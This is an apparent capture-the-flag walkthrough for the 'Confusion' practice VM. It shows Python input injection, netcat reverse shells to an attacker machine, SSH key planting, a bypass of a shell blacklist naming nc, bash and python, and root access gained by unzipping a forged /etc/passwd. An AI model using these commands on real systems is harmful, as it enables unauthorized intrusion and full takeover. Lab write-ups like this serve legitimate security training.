https://hackmyvm.eu/machines/machine.php?vm=Confusion
Scan ports.
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 15:59 CST
Nmap scan report for 192.168.56.100
Host is up (0.0040s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
32145/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, NULL, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| Welcome To The My Magic World
| many times you want to ping?:
...
Use nc to connect port 32145.
~ nc 192.168.56.100 32145
Welcome To The My Magic World
How many times you want to ping?: 2
PING localhost(localhost (::1)) 56 data bytes
64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.035 ms
If we input some invalid number, we will get error msg.
~ nc 192.168.56.100 32145
Welcome To The My Magic World
How many times you want to ping?: 12;
Traceback (most recent call last):
File "/opt/ping.py", line 7, in <module>
no_of_packets = int(input("How many times you want to ping?: "))
File "<string>", line 1
12;
^
SyntaxError: unexpected EOF while parsing
^C⏎
If we input some evil code, we can make it run.
~ nc 192.168.56.100 32145
Welcome To The My Magic World
How many times you want to ping?: __import__("os").system("id")
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
PING localhost(localhost (::1)) 56 data bytes
So we can get reverse shell.
~ nc 192.168.56.100 32145
Welcome To The My Magic World
How many times you want to ping?: __import__("os").system("nc 192.168.56.150 1234 -e /bin/bash")
──────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:39196.
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
Spawn an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
iamroot@confusion:/$ id
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
iamroot@confusion:/$
Upload id_rsa.pub to get ssh login as iamroot.
iamroot@confusion:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
We found 3 users, and check sudo -l.
iamroot@confusion:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Oct 25 08:44 .
drwxr-xr-x 18 root root 4096 Oct 25 06:02 ..
drwxr-xr-x 2 iamroot iamroot 4096 Oct 25 15:16 iamroot
drwxr-xr-x 3 sammy sammy 4096 Oct 25 14:56 sammy
drwxr-xr-x 2 still still 4096 Oct 25 14:56 still
iamroot@confusion:/home$ sudo -l
sudo -l
Matching Defaults entries for iamroot on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User iamroot may run the following commands on confusion:
(!root) NOPASSWD: /bin/bash
But no matter what I input, still need input password.
Then we check the ssh login msg of user still.
~ ssh still@192.168.56.100
Have you ever thought?
If
Cindrella's
Shoe Fit
Perfectly
Then Why
Did It Fall
Off?
still:confused?
Then go for Port 32145 :)
The default shell has been modified for still.
iamroot@confusion:/home$ cat /etc/passwd
...
still:x:1001:1001::/home/still:/home/still/SoMuchConfusion
We can check the source code of /home/still/SoMuchConfusion.
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
cat /home/still/SoMuchConfusion
#!/bin/bash echo "Welcome To My Secret Most Secure Shell :p" read secure_shell if [[ $secure_shell == "id" ]] then echo "uid=0(root) gid=0(root) groups=0(root)" elif [[ $secure_shell == "whoami" ]] then echo "root" elif [[ $secure_shell =
= "python3" ]] then echo `$secure_shell` elif [[ $secure_shell =~ ^nc* || $secure_shell =~ ^bash* || $secure_shell =~ ^python* ]] then echo "Smooooooth Hehe :p" elif [[ -z $secure_shell ]] then echo "Bye-Bye" else echo `$secure_shell` com
mand not found fi command not found
So we need to bypass the blacklist to get a shell as user still. Here I choose /usr/bin/dash.
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
/usr/bin/dash -i
$ nc 192.168.56.150 1234 -e /bin/bash
───────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:39226.
id
uid=1001(still) gid=1001(still) groups=1001(still)
Spawn interactive shell again, and check sudo -l.
still@confusion:~$ sudo -l
sudo -l
Matching Defaults entries for still on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User still may run the following commands on confusion:
(sammy) NOPASSWD: /usr/bin/python3 /opt/password.py
Run it, we get an encrypted string.
still@confusion:~$ sudo -u sammy /usr/bin/python3 /opt/password.py
sudo -u sammy /usr/bin/python3 /opt/password.py
QWJCYXJQbmFQZW5weFpsQ25mZmpiZXEK
Try to decrypt it with ROT13. Then we can login as user sammy.
~ ssh sammy@192.168.56.100 ...
sammy@192.168.56.100's password:
sammy@confusion:~$ id
uid=1000(sammy) gid=1000(sammy) groups=1000(sammy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)
sammy@confusion:~$ sudo -l
Matching Defaults entries for sammy on confusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sammy may run the following commands on confusion:
(root) NOPASSWD: /usr/bin/unzip
Then we can modify /etc/passwd, zip it, and unzip it back to /etc.
sammy@confusion:~$ cp /etc/passwd ./
sammy@confusion:~$ openssl passwd 123
fpjdFvRQf46EA
sammy@confusion:~$ echo "root2:fpjdFvRQf46EA:0:0:root:/root:/bin/bash" >> passwd
sammy@confusion:~$ zip passwd.zip passwd
adding: passwd (deflated 63%)
sammy@confusion:~$ sudo unzip passwd.zip -d /etc
Archive: passwd.zip
inflating: /etc/etc/passwd
replace /etc/passwd? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: /etc/passwd
Finally get root.
sammy@confusion:~$ su root2
Password:
root@confusion:/home/sammy# id;hostname
uid=0(root) gid=0(root) groups=0(root)
confusion
